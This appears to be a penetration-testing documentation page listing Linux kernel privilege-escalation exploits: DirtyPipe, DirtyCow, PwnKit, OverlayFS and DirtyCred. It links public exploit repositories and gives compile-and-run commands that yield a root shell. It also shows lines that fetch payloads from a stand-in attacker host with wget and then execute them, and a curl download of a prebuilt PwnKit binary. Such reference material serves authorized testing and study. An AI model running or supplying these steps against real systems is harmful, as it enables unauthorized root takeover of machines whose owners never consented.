> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Kernel Exploits

> Linux kernel exploitation: DirtyPipe, DirtyCow, PwnKit, and Linux Exploit Suggester.

## Methodology

```
uname -r → check kernel version → find exploit → compile → execute
```

***

## Linux Exploit Suggester

### les.sh (Recommended)

```bash theme={"dark"}
https://github.com/The-Z-Labs/linux-exploit-suggester

# Transfer to target
wget http://ATTACKER_IP/les.sh
chmod +x les.sh
./les.sh
```

### linux-exploit-suggester-2 (Perl)

```bash theme={"dark"}
https://github.com/jondonas/linux-exploit-suggester-2

perl linux-exploit-suggester-2.pl
```

***

## CVE-2022-0847 — DirtyPipe (Kernel 5.8 - 5.16.11)

Overwrite read-only files via pipe splice. Instant root.

### Check

```bash theme={"dark"}
uname -r
# Vulnerable: 5.8 <= kernel < 5.16.11
```

### Exploit

```bash theme={"dark"}
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

gcc exploit-1.c -o exploit
./exploit
# Overwrites /etc/passwd → root shell
```

Alternative (SUID method):

```bash theme={"dark"}
gcc exploit-2.c -o exploit
./exploit /usr/bin/su
```

***

## CVE-2016-5195 — DirtyCow (Kernel 2.6.22 - 4.8.2)

Race condition in copy-on-write. Write to read-only mappings.

### Check

```bash theme={"dark"}
uname -r
# Vulnerable: 2.6.22 <= kernel < 4.8.3 (patched in 4.8.3 / 4.7.9 / 4.4.26)
```

### Exploit — Overwrite /etc/passwd

```bash theme={"dark"}
https://github.com/firefart/dirtycow

gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword
# Creates user 'toor' with root UID (firefart is the author's handle, not the username)
su toor
```

### Exploit — SUID Method

```bash theme={"dark"}
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

gcc -pthread cowroot.c -o cowroot
./cowroot
```

***

## CVE-2021-4034 — PwnKit (pkexec)

Polkit pkexec local privilege escalation. Works on almost all Linux distros.

### Check

```bash theme={"dark"}
pkexec --version
# Vulnerable: polkit < 0.120
```

### Exploit

```bash theme={"dark"}
https://github.com/ly4k/PwnKit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit
```

C version:

```bash theme={"dark"}
https://github.com/arthepsy/CVE-2021-4034

gcc cve-2021-4034.c -o pwnkit
./pwnkit
```

***

## CVE-2021-3493 — OverlayFS (Ubuntu)

Ubuntu kernel overlay filesystem privilege escalation.

```bash theme={"dark"}
# Vulnerable: Ubuntu 14.04 - 20.10
https://github.com/briskets/CVE-2021-3493

gcc exploit.c -o exploit
./exploit
```

***

## CVE-2022-2588 — Dirty Cred (Kernel 5.x)

```bash theme={"dark"}
https://github.com/Markakd/CVE-2022-2588

gcc exploit.c -o exploit -lpthread
./exploit
```

***

## CVE-2023-0386 — OverlayFS (Kernel \< 6.2)

```bash theme={"dark"}
https://github.com/xkaneiki/CVE-2023-0386

make all
# Terminal 1
./fuse ./ovlcap/lower ./gc
# Terminal 2
./exp
```

***

## Compile on Attacker (Cross-Compile)

If target has no gcc:

```bash theme={"dark"}
# Match target architecture
gcc -static -o exploit exploit.c
# Transfer to target
python3 -m http.server 80
```

On target:

```bash theme={"dark"}
wget http://ATTACKER_IP/exploit
chmod +x exploit
./exploit
```

***

## Quick Reference

| CVE                           | Kernel          | Year | Reliability |
| ----------------------------- | --------------- | ---- | ----------- |
| DirtyCow (CVE-2016-5195)      | 2.6.22 - 4.8.2  | 2016 | High        |
| PwnKit (CVE-2021-4034)        | Any (polkit)    | 2021 | Very High   |
| OverlayFS (CVE-2021-3493)     | Ubuntu specific | 2021 | High        |
| Baron Samedit (CVE-2021-3156) | sudo \< 1.9.5p2 | 2021 | High        |
| DirtyPipe (CVE-2022-0847)     | 5.8 - 5.16.11   | 2022 | Very High   |
| DirtyCred (CVE-2022-2588)     | 5.x             | 2022 | Medium      |
| OverlayFS (CVE-2023-0386)     | \< 6.2          | 2023 | High        |
